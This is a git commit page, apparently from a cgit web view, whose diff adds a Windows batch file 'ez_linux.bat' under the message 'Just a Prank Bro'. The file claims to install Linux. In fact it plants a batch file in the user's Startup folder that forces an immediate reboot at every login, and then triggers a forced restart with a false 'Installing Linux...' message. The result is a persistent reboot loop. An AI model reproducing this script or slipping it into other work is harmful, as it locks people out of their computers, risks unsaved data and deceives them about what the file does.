summaryrefslogtreecommitdiff
path: root/Ez Linux
diff options
context:
space:
mode:
authorrafa_99 <raroma09@gmail.com>2021-09-23 16:40:24 +0100
committerrafa_99 <raroma09@gmail.com>2021-09-23 16:40:24 +0100
commit6c2e76026c0fe6211c171c36d5b5aff523b989b1 (patch)
tree9749a52a77ae910c7e949e83e498fbee8fb9b5e3 /Ez Linux
parentb29bf8c1c7b03f86926b0d876caf31a111eefe22 (diff)
Just a Prank BroHEADmaster
Diffstat (limited to 'Ez Linux')
-rw-r--r--Ez Linux/ez_linux.bat4
1 files changed, 4 insertions, 0 deletions
diff --git a/Ez Linux/ez_linux.bat b/Ez Linux/ez_linux.bat
new file mode 100644
index 0000000..4fca6ea
--- /dev/null
+++ b/Ez Linux/ez_linux.bat
@@ -0,0 +1,4 @@
+cd /d "%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
+echo @echo off > pranked.bat
+echo shutdown /r /f /t 0 >>pranked.bat
+shutdown /r /f /c "Installing Linux... System may reboot a couple times" /t 10